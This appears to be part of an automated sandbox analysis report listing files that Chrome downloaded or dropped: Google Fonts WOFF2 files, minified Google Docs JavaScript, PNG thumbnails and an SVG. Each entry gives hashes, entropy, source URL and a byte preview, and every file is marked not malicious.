                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:VyjYr2gmTOswu8lSMMVAHI/qn8A8E1/fz6S8Y:I2zSOswu8AzG821rT
                                                                                                                                                                                                                                        MD5:421B045B5EB019D56F6407AE63E57A92
                                                                                                                                                                                                                                        SHA1:F0D0D18A1887D371B18C1B06B99AD2D3C0923E8D
                                                                                                                                                                                                                                        SHA-256:5DCEBB5EC80A2DDAB469A77F1A37412C34205EF76D054131083B0BF663B786FB
                                                                                                                                                                                                                                        SHA-512:A426E4F8C2F2397038F4A1F60ADB091BA097DABE9C4ABF8967F80B20C98F1A7569DE9CCEED89716329FBBAEF0DD0AFB4B5EFF0E6C96DB152ACC86F1CF799C2C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/merriweather/v30/u-440qyriQwlOrhSvowK_l5-eiZM.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......8..........................................T.`.|.....m....0.{. ..6.$.<. ..r.W..1...#..4...lc.K.e+c.@3.gq.:#..n....CYG..Q...W.sN...If..w.?7A....5..Rh......D......c.Iv...w........T..dMy.?...x$.H-.5.....GQ@.....G]..,..|H!T...x+mK.M-....X.u0n...O..5..mS..+J*.|..CS......E...#........,.%l\...v....?.}...=.Fu..)eo./w3...8..i.lf..!y"U...3:.8..vy...*.....(..(..c...!....4....1.....0..`.....Q..4| Z...j...B....h.h.v.K.(4.d..o..J%`(....zP...0#...y..#..B....#..L.......C..#..P.>+.....@.X....m....F.........AO..t./..X......(.....tq.i....P.....o.M..).m.......bX..n.1...n...-.;........1kR....p..w]0.x.fYz......[W.^.Z......#.K........... ..:...x..O.Q.8[.PK.(.w>'o........^..KV.H.+F.1.qh%Whx*....Z.).*3.4{..;.K..w0....N .Dn.Sj.l>..|Y.....&.U..4.^../<.@3.....VBhD...P.8...&.........7.e../.....G...}x.Ne...,.,.n.....T..4.6`....i.M..+.YC-..]@.4.6..qi$%.Y2,.L.=...6...u.10.g.2%9..;..fC.j..P.2QHv..T4......X"lz'..n..N...5...|...4.)|...($..Y..9.3...F.t....rN..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 26992, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):26992
                                                                                                                                                                                                                                        Entropy (8bit):7.992281768071691
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:384:0qMvx5Q6PuscBhhGTTMJzBASBFa99ITYpp1b2Q17kUwBkEV50x9Xg96Dsvv9wO:0qMvx5Q6Gsah2T2BAuTYwBppri9XhS3
                                                                                                                                                                                                                                        MD5:92BAE553B71BC6DEDFB17E73BA5029EB
                                                                                                                                                                                                                                        SHA1:4B581AF52A479729888031EB60722A306A68DA55
                                                                                                                                                                                                                                        SHA-256:49BE4E1A8B5E250DE2A7A738CAC6C157E4148414CAEAB4055D92DA8152D95619
                                                                                                                                                                                                                                        SHA-512:8895176C2915FF0AF40D923256CE4371B639B24945D9E4183B8146EAFFF8DCA58E87E3CCFFEED8B2CAC88A7BB2906875C4E3CF1DA6B39F4563821A8AC287E130
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lexend/v23/wlptgwvFAVdoq2_F94zlCfv0bz1WC9wR_LU.woff2
                                                                                                                                                                                                                                        Preview:wOF2......ip.......8..i...............................D....`?STAT*........<..A.....6.$.... ..h..x...!...s.!............gK....r..u&5{.H.IgT:....?5..qi.i.c.m.^!.L..dZ ..=.%2......m.....\Fr...=.,a%..D%..1...r.".o-s..N%.9.u8.s.1&[k..B..m6D:.t..M.z.;..F@.A.RIT.I.y.Q....N.. kG..dD^x....*.bs.JLb..2.St..f....|.Y}.M|.y>!.p.|../sT?T.c'~.......g<...D.H..Q..'}...........3.+.....fN].D...."0n....?....$..)@JR.\ ...n..WX;m....d9.R.?.....B.....R..\_...~.m..V._.ml.*9pL..Jj..(9.Mi....rL.`m.`.S.|..g....?..O>...)...hc.f%.m.6.7..Z..c.T.....%...n.Z"..i..G...|.=.A1:..9.......r....+=1...........T.5.....5....B......F.,Z....)..E7..q).!...:.0/.V.9O./......}z1)`8..T....,.......I.@..?.FT@q.M...{S.A.c....sI........ .K..5.mP....Wg.s.'....IuaD..........~.+......`.-.[.....(g#.........,..[..|r.u...3+..J~......p.=...1.)o..W.J..45.f.8..A. .Qg..H.N..O..yc....."k....w....2\.Z...q...a.7....C6.C.....fg..3;... O...........9.gp.F...o...I.O.W.Y...*..<P.R$..{.d.6UY..R4.{V.......!?.x.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (668)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1348
                                                                                                                                                                                                                                        Entropy (8bit):5.423559107710884
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ko0Ym0nSLlv6jPOAwjYob/0QTIpsW7DV6snA56n+bbxNUpSiiGbRF2GbApX7OT1k:DEbLlSjmVKQeFV6oP+bbXSIGbn2GbG8k
                                                                                                                                                                                                                                        MD5:D95CC43D3277528172D5E5D8C0470809
                                                                                                                                                                                                                                        SHA1:5EE3A514CC6EFDA10627ADAD8314836A5A4D26C3
                                                                                                                                                                                                                                        SHA-256:CF5D8238529817FC5E670F52D362A1D73753F6A80CCE1F6492C1564D1671B0FF
                                                                                                                                                                                                                                        SHA-512:E7A7FF1CA706E323B84860FAE640041E4BB689E7F3026195B6C8D0DED1B0B382A970F0C7C048F9B78E239C4DC29A8BE2DDBBF08D42EC97B8B66EB8AFEB4A54D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:"use strict";this.default_SocialPeopleHovercardUi=this.default_SocialPeopleHovercardUi||{};(function(_){var window=this;.try{._.y("P6sQOc");.var UGa=!!(_.Wj[0]>>17&1);var WGa=function(a,b,c,d,e){this.O=a;this.V=b;this.T=c;this.ha=d;this.W=e;this.H=0;this.N=VGa(this)},XGa=function(a){var b={};_.za(a.jt(),function(e){b[e]=!0});var c=a.Ws(),d=a.Ys();return new WGa(a.Xs(),c.H()*1E3,a.Rs(),d.H()*1E3,b)},VGa=function(a){return Math.random()*Math.min(a.V*Math.pow(a.T,a.H),a.ha)},O5=function(a,b){return a.H>=a.O?!1:b!=null?!!a.W[b]:!0};var YGa=function(){this.H=_.WA(_.SGa);this.O=_.WA(_.L5);var a=_.WA(_.vZ);this.fetch=a.fetch.bind(a)};YGa.prototype.N=function(a,b){if(this.O.getType(a.Cb())!==1)return _.zq(a);var c=this.H.ku;(c=c?XGa(c):null)&&O5(c)?(b=ZGa(this,a,b,c),a=new _.yq(a,b,2)):a=_.zq(a);return a};.var ZGa=function(a,b,c,d){return c.then(function(e){return e},function(e){if(UGa)if(e instanceof _.Dg){if(!e.status||!O5(d,_.Lm(e.status,1)))throw e;}else{if("function"==typeof _.Cw&&e insta
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 4344, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4344
                                                                                                                                                                                                                                        Entropy (8bit):7.937797980739236
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:JLTn03nQsDwAbFI1XLKrlgbbNaF8l5efEY5TMDg+P/6sJA6L1:JLTHKwAmxLUlQbNQW5edWg+Xtaq1
                                                                                                                                                                                                                                        MD5:E5A3502E3717398EE835D98F84874738
                                                                                                                                                                                                                                        SHA1:75C4C2D0F1A2EDA7E16A16293BA840E19991EF1A
                                                                                                                                                                                                                                        SHA-256:E5ACBE17FD4E63CCA2CE1B72E482FC2411D27D9D534476AD7F0108B9DF087FCE
                                                                                                                                                                                                                                        SHA-512:609920E215906893F52928F75E2A7B4704F5FCD4D5D8F2258A9D410EFD06270DEBA734F41F6BBAB7C5FEF693C40A2CF3A84B57250F360484D2789C928ED202EF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lobster/v30/neILzCirqoswsqX9zoSmMw.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............".................................p.`.l..F..m....8.L.(..6.$.L. ..<.}..<.. E.b.8...5..F.Am.......z=...$q..".........].)..~....3'z...0.v..r.....2....L.!..O..?w........X.Dd..X.e.....U>}?:.....c.}..m-..........@......]A.K#=,..M.+....k.gE..... .e..}s.4Y+j..........]!yHI."..6....../[....l..X.....M...zD.tQ=@.'.....4..E..jk& .".. ..{...lA.<.-.@.>.nB...J;9$U.}U..m...p.?.^.$.9...d.........;W@ajktUe....P......B1..o.....M D..Hb...i.:B..2..).U.:....U....yx.z[*.....:...M.......r.....3Q.....835..Z.`.*........J..........v.......v..a($X..B..OCdd..hLxQd"I4.MS......1.4....u..@..Q.(...ia....x..'...y%~=..@....l(h.P...H0.....t..H.5a.hXtH.~...;?Y.>.;....q...F<.7.{.i..>.sH....[y.Y.p..W...X.6.%...(F$.M..N.Gw..:..b..0."..`......*...R./.....LS..kA.h.A..%. .R...2.^_0.cW Z..C..,4..`..=.X....j.j2J...g..PtT....<y..,.\._...s...{.*R...:..".. .@...)....+.3.)...,..g9Bj.Q...O.A....y&.:....eo......Z.2......8\..>?U.O+p..|./...ra.qHG&...FA}....($.k.:.z.(.....tT@.g
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 51908, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):51908
                                                                                                                                                                                                                                        Entropy (8bit):7.996595502684702
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:fzGnGwKraL9FifsTJDbwFLin7jmqdaNID8i4LisZQIXEgEMRMEsTlENiCX21So/L:7GnhLJPwNiH0GIXEgbRMLCdo/x6gfBh
                                                                                                                                                                                                                                        MD5:0094E8971B7980E06254D21F1891BCE3
                                                                                                                                                                                                                                        SHA1:7132DF9F85FA53AB626E2CEE5EEDB2D518539023
                                                                                                                                                                                                                                        SHA-256:2DA7BADF8D39D06D1C009D38A133DACFB529BA49B7F0BE3646F7737B65792200
                                                                                                                                                                                                                                        SHA-512:CAEE6C3CE7496300910ADD9B1777342AC8723BF9603B419028FB3D3A2547C2F7C8764C37E56B3CCE1710C209B9BEF0E24063EB2254DE424174E31905025490C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWuYjammW.woff2
                                                                                                                                                                                                                                        Preview:wOF2...................Z..........................f...b..R.`?STATZ.....~........|..p.....6.$.... ..`. ..N[;.....8:...............1.]+=.P.......6...P.Z....m[......d!cz..}>... Z...u...=E......I..;N....|f.).l=.mb.I..N%..c..3...8_..x.W.g*....Tj6&*.>....X.T..k.kW.&..6....]J.:..9...../...vO/...iC.._..&xs!..ya5n.....X....s|.b..l..e.{ Y...S...V)e(.."...2x...BJ*..}..._....*.$*Q.-\:.Yo/Z.......e...e.Fp..3.!.Y.$Y?.REi.0.kdE2..lx.'C.0]....6N.W.O.DF...?.M.&d.%w.Fx............Cwli5n2..B....\...e;r.I./O<k<.;3._.&q.C3KV..t<$B!4J...y~m.9..~..6a..........?F.fb.`$F.bD..*...h^CL...i.M....u....U1.,X.....fMmc.(.2^Q@.m0..#..W..o...f.3.....B=.....,V.H..R1X@oT..mZ..8/..............u3........S..5Flc........"F.T...#..T.Q..1Q..`.;.g6.za.{.\..kS0...r-.X../t.WWX..l.r..`....?.{G.*...E..X.....E.............?....sR...&I.E.[q~~.....UP!....{.N?...U.6K.&.a..o.OZ.|i...../..E...=(..H7...@.$1..N..j....n.b(:7.z...s..U.{s.f&..v.(..$.XVD..EL.X....1....;4..d...J..21....L.........D.O0....9...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8225)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):104371
                                                                                                                                                                                                                                        Entropy (8bit):5.768403224622953
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:IccKUwdystkb/NTMr8XKWRNIGBrrt/9+gu9uvjPq:RUQysmb/N4EK+IWSgBzq
                                                                                                                                                                                                                                        MD5:72F9C31A344E3B2DE6662D58FCFD5329
                                                                                                                                                                                                                                        SHA1:3072C23BD415B648A0A5235D23409FBBB1ADCAE9
                                                                                                                                                                                                                                        SHA-256:B6F153516181FC486DF78C6977B8F072735EBA4A6C8747FD7535C02870F00829
                                                                                                                                                                                                                                        SHA-512:A18ED4A432A5C502445239757D490C090FBF86940BA9D62CA95C77E1D061D46F1BB4F47C0CAC7A3CF3BBF6ED8FE4CEFC5B6FB08F22B3C6BB9A3702A7275B50C7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:var gil="kix_pre_tertiary_deps";mK(gil);.var hil=" at ",iil='" alt="">',LZ='"><div id="',jil="/drive/v2internal",kil=";base64,",lil="ASSET_COUNT_EXCEEDED",mil="ASSET_MEMORY_EXCEEDED",nil="AVAILABLE",oil="BAD_REQUEST",pil="COMMENT_COUNT_EXCEEDED",qil="CONTENT_REVIEW",ril="CONVERSION_INPUT_TOO_LARGE",sil="CONVERSION_OUTPUT_TOO_LARGE",til="Can't import this file right now. Try again later.",uil="Close banner",vil="Couldn\u2019t load user",wil="Description",xil="Dismiss banner",yil="FILE_TOO_LARGE",zil="Got it</span></div></div>",Ail="INTERNAL_SERVER_ERROR",.Bil="MAX_CELLS_EXCEEDED",Cil="NotReadableError",Dil="ONLINE",Eil="RESPONSE_TOO_LARGE",Fil="Revision no longer available",Gil="SHA-256",Hil="SHEETS",Iil="SLIDES",Jil="SecurityError",Kil="Today",Lil="USER_QUOTA_EXCEEDED",Mil="USER_RATE_LIMIT_EXCEEDED",Nil="X-Goog-Drive-Resource-Keys",Oil="abuseIsAppealable",Pil="abuseNoticeReason",Qil="accept-language",Ril="alternateLink",Sil="anyone",Til="application/json",Uil="application/json; charset
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71359
                                                                                                                                                                                                                                        Entropy (8bit):7.989852377174042
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:1XXmize6u8zE7B2y3KcMQuPNfvxhMRm+k7Kxa7esj:w5CyB2y3K6uPdbHtj
                                                                                                                                                                                                                                        MD5:339DF7AD4183AD038190266CD1109DBB
                                                                                                                                                                                                                                        SHA1:A04129AF3B4B4BDDBABBA33115D703C95CF2C3DD
                                                                                                                                                                                                                                        SHA-256:D587BD38DBBE97BA75323AD1A1C9380FC179EF91B1A181D65FAD20F3B3275BF0
                                                                                                                                                                                                                                        SHA-512:651209F6DAC4177CF4FCA16568272D2024054344FAF4DA17625C3FA2BE679A7A68790E297C426CEC461921BB6AD631463344E199F0FF1692F671C60660CF983D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...A......./=K....G....... ,.a............@X..... ,.a........a...@X..... ,@X..... ,.a........u.N.X.......h..E34@ .!B"..$. . 4Yc..q3....,..............N.26@{....:.t(#..+<@X.....KX...a......a........a.... ,a.... ,@X...%,@X...w.<..H...'...3333333/333333.033,.=R.V...q2.......q;...r.\....\pq....V\.....4!...K.wa...>..~sE...v...'...ZI[.+f....u7..i.Z. .O..,.......dG.....Vv`{..y6.q..v.....$`M<..g.?'Zre....x..4..,I..yvC.......+F./nu...r.K.......W7.}..C;...N.X......\.?.h8..>.%/..I.K.........|{.....f...$`.r.K.w...j.Oi..H.....X...%.X>:Xr.>.J.}.......P\.Q_..\..w.P...].?......9Sy...............rxav.z.o....FC1.Vu6.n,c....k.o.......[..3>?..&`M8UuW..^'..v..t.[ti....k..3...;=<....8W}{.._.3.9..i;.$~*5Hzx.R..n.u.k..Q........_...jCO..s..;y.../...p(.....>uF..s..=.]".....]A7.T...-m..p...~p./lo.=....-H.q..c>>......YM8..B.......&.X.V...X......T.L.o...N.8_._..b..qN.....^..M.>y.... !....i9]y.s...{.W|.g....O.....X.o.-=.e;..9
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1437)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):103047
                                                                                                                                                                                                                                        Entropy (8bit):5.479296079433312
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:u9vD7mVMyv6IlcRYyCnNJOC/O7P1Ul1PEG9Kc3YJG7RDljk7ww3w+h0W/v1DH94z:jMyvhJyj1UjPEWKcxUww3wM0W/N7941d
                                                                                                                                                                                                                                        MD5:12D19416A27EDA8569FC549B5497EA8A
                                                                                                                                                                                                                                        SHA1:EE44DC666D32B79A51074BA807B24B34D8D99383
                                                                                                                                                                                                                                        SHA-256:4FB5044054623AE074519C00337BB4A9BA835026041CE5B1795BB8A879D4F9D9
                                                                                                                                                                                                                                        SHA-512:8CED5136E0E502A327A10373AEC4F1BA72492E2E9EF5768337AA8A4ECEA11E925263D4E8114812DB1D3E2AB45EF7077F5E631BC223F116D8A988DFE6DEA37009
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 99952, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):99952
                                                                                                                                                                                                                                        Entropy (8bit):7.997773585050746
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:jm9YIoqKNZx+lkLqhB3jeRC2X9SPxK72Hu:jm9YfM/hMZSi2Hu
                                                                                                                                                                                                                                        MD5:4DC58D8C42A13CD77CF2CD978F639388
                                                                                                                                                                                                                                        SHA1:221EDE548E9E9CF711595D6511C73CD8EA4EB595
                                                                                                                                                                                                                                        SHA-256:B93F4669CC09016E4D1AD1836A4CD1EBCF832C22979E5FA11DB4F7C3620223AE
                                                                                                                                                                                                                                        SHA-512:52D3C3AD61265E984ACE82FF6F1AD5B663E76955309866EF7B7D9EA985AD2917FB06FA8BDD96B61208035FD1E2F7DD26A9BE91322A196A0B628C22BC50242613
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lobster/v30/neILzCirqoswsqX9_oA.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......p.......,.................................L..P.`.....F..m.....8..0..\..6.$..X. ..<..c..<[#q.....U..t..._MK?...G.u......9.PU.FG.c{y....9..|............@&..0J|.Uh.R......7De.A...$3...5..v).(..e..J.TP.B.Q.....1.e#..D.mw.'.W.@..a.a..:.R^c......tv...............pc..c..Q..I.......O>KV..A6..C.B...:..e..5.9XVC..!Y[..B....?.3<.s.v@&..E'a.G....}?I.(k4{W>e.......W1.(...W....w../?.<.%.9.]._.[..v~..j....xm....Zj...S.J.I..9..W3.u.VC.. . ...:;@..<."9v~CTC...Sj.V...q.~.'"....9......F. ..+...E.Q.R3.=13..Q...2.eHR8...a.8>Q.....=....mD1.")..!..m.....J.:..c...^...z.....zQ.V.S6s...A.c..x..I.'...4:/I........G..c.t"Z1.y..M..;.p..y...2..~. .P~`;.6.g.)m..pLRUA..-.}.hg..Z.i.\.iw...v7..f.......X1*.....su....=0...8..].&...Xl...e(.T`....+.'.4.y........f.mN...vVtT..B..........7.sSRr.*Y.c0:.C1...,.o..{.F.....z..w.6............1,sgD$.d`.S(.b..a^....HyJ".Z.2....'.w..M/..I~......n.w..D..L..b......_.r++......r.z=..Q~p-;@..i.....T.)ju....?...z.H.P.p.rC.q..t......j..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):492346
                                                                                                                                                                                                                                        Entropy (8bit):4.5619110007692445
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:7ei3GES/c5UzaHm1PePqgbVMsHO5CWlsuWotSa/FWsmxXWS4KaXxWbyvL4wZ84bi:zAhUVc3H86iWoWZXhoB
                                                                                                                                                                                                                                        MD5:62606202635606B3D1FEF6207A65C375
                                                                                                                                                                                                                                        SHA1:1504EE1910621160729168CCFB27DA76A4A81C42
                                                                                                                                                                                                                                        SHA-256:3FFAF8940A447C9D229C3DA17F73D9A77A255741C9BF827F89387F8A41779DBB
                                                                                                                                                                                                                                        SHA-512:CDF1D437A11792299020631B9C0FEB54465E232130C1FE59A463E2C97E853DB92C71836F968E245855BEBA578F0EBED1C83EF1DCEAD90EAE453555CB037F8C79
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1884" height="1368" x="0" y="0" preserveAspectRatio="none" version="1.1" viewBox="0 0 1884 1368"><path fill="#fff" d="M1207 986q-2.094 0-3.547-1.453T1202 981t1.453-3.547T1207 976q1.078 0 2.063.445c.984.445 1.218.722 1.687 1.274V976h1.25v4.375h-4.375v-1.25h2.625a3.65 3.65 0 0 0-1.367-1.375 3.7 3.7 0 0 0-1.883-.5q-1.563 0-2.656 1.094-1.095 1.093-1.094 2.656c.001 1.563.365 1.927 1.094 2.656q1.093 1.095 2.656 1.094 1.203 0 2.172-.687a3.63 3.63 0 0 0 1.36-1.813h1.312a4.93 4.93 0 0 1-1.782 2.703A4.85 4.85 0 0 1 1207 986"/><path fill="#444746" d="M1251 1250.8q-.988 0-1.862-.375a5 5 0 0 1-1.538-1.025 5 5 0 0 1-1.025-1.538 4.7 4.7 0 0 1-.375-1.862q0-1 .375-1.862a4.82 4.82 0 0 1 2.563-2.563 4.7 4.7 0 0 1 1.862-.375 4.6 4.6 0 0 1 1.862.375q.876.375 1.525 1.037.663.65 1.038 1.525a4.6 4.6 0 0 1 .375 1.863v.75q0 .687-.487 1.175a1.58 1.58 0 0 1-1.163.475 1.53 1.53 0 0 1-.788-.213 2 2 0 0 1-.6-.562 2.7 2.7 0 0 1-.812.575q-.45.2-.95.2a2.31 2.31 0 0 1-1.7-.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):27271
                                                                                                                                                                                                                                        Entropy (8bit):7.979850504525943
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Z9w16tVaAvdV8Tka8jyoRNX5sIxKOKpGgiX/:ZXEmOkgoRjhYdm/
                                                                                                                                                                                                                                        MD5:2D31E3052FF39F242168A03DC2188C59
                                                                                                                                                                                                                                        SHA1:30FB901A67CF2DA592FB95D89FCE50D6F7807B71
                                                                                                                                                                                                                                        SHA-256:34758C07D1CAF247CA117768EB74D15EA622F008D0BD4F5ABC56EE91A5CE8C11
                                                                                                                                                                                                                                        SHA-512:B638D18A80526B3E11D7AC17137F3498B295BE05B1B24206F4A8E782585393A4F6DED970BD1396A3FCF760A0797397A75B7F1CCC9353C3ACA49B0B5F0EADA664
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1-dPCrgWVBjitVcyhdbXu0rj5F-yRjqlq81TZIMEqqG0_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..jNIDATx.....a...O.@.....@h..I{.Ak.E@...!.%GH.\K.!.{C.......a............@X..... ,.a.......J........a...@X..... ,@X..... ,.a.........H.=...c3.DI.s{[M...:~..L...t.Da..x..r.......]d..@.a........a...@X..... ,@X..... ,.a.....4....9@.vax....Nm.m35..6..m.m7(b........ .;.gr......L.;.{j.K[._.r..]-M.at..1..@.....+R.u.ya....a...Z.R..w.^...F...tC'.[.#.*..L*.s..z......:....T.1.........#.....G..}M..).........'b...aU;...>.m6R.i....p4,\...W.O-...'..$$&..II.+.,.g.f..-.M......E......3~k4XZ...L...x.....j.n`>.{z.........\\[......hG..&E.....`...W..:Y2..l.O....bN..........%.~../..]kg.{.&.e.e.{..v..5..p...V.H...1......q..+..c.-)....."iK.rM3Q&.!.MVb.......u)...M.{...s.w....E...Q.(s...RngXg'..$F7ly|.~..%...F).G..F.g.....kl.n..f$...3..k_....J7..d...5.......KR.;.nP.>..%fF.3e............d........7.!..y}....%.R.G...sZ;.g1............D..E....rZ.....D.?..z....!$...N.I......l.d....B..L-.....z.....{.......\.-./X.f.F..p.q..!.......p
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 50264, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):50264
                                                                                                                                                                                                                                        Entropy (8bit):7.996208458310892
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:in/nRPDOHUY6sQaVZNT6ujDwWhOte5ocSYHh0SfncpKN8Mid5BRen7rQy:i/dy0zsQaVf5DwcGx5YB0KOMWRe7r
                                                                                                                                                                                                                                        MD5:AB5E010EBED9BCFB98CDB5BD47D3E430
                                                                                                                                                                                                                                        SHA1:5D1AA4B896BF05AFE8978F74E2E88A53B0D9BB6E
                                                                                                                                                                                                                                        SHA-256:B5477EC958C9F1F06AF0D54F50633B66C76C5E010450283C5620CFC79E57E963
                                                                                                                                                                                                                                        SHA-512:EEF8BCC39498E40562E6E919969492E20093AC577821C34E85D78387F7B0ECDFA90CF14FFD2A8F64FEB608BA0253397F674E10CDE82FE2CC5E80BBA7CF25BB4C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lora/v35/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Ckq0.woff2
